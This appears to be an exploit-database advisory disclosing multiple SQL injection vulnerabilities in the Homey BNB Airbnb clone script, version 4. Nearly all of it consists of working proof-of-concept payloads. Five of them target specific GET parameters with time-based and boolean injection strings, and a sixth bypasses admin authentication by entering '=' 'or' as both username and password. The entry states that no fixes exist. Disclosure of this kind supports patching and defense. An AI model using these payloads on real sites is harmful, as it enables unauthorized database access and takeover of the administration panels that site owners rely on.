Airbnb Clone Script - Multiple SQL Injection

2019-03-28 15:05:31

# Exploit Title: Homey BNB (Airbnb Clone Script) - Multiple SQL Injection
# Date: 27.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/
# Demo Site: http://sitedemos.in/homeybnb/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/rooms/ajax_refresh_subtotal
Vulnerable Parameter: hosting_id (GET)
Payload: checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--
DXVl&number_of_guests=1


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/admin/edit.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=if(now()=sysdate(),sleep(0),0)


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/admin/cms_getpagetitle.php?catid=1
Vulnerable Parameter: catid (GET)
Payload: catid=-1' OR 3*2*1=6 AND 000640=000640 --


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/admin/getcmsdata.php?pt=1
Vulnerable Parameter: pt (GET)
Payload: pt=-1' OR 3*2*1=6 AND 000929=000929 --

----- PoC 5: SQLi -----

Request: http://localhost/[PATH]/admin/getrecord.php?val=1
Vulnerable Parameter: val (GET)
Payload: val=-1' OR 3*2*1=6 AND 000886=000886 --

----- PoC 6: SQLi (Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/admin/
Username: '=' 'or'
Password: '=' 'or'

Fixes

No fixes

In order to submit a new fix you need to be registered.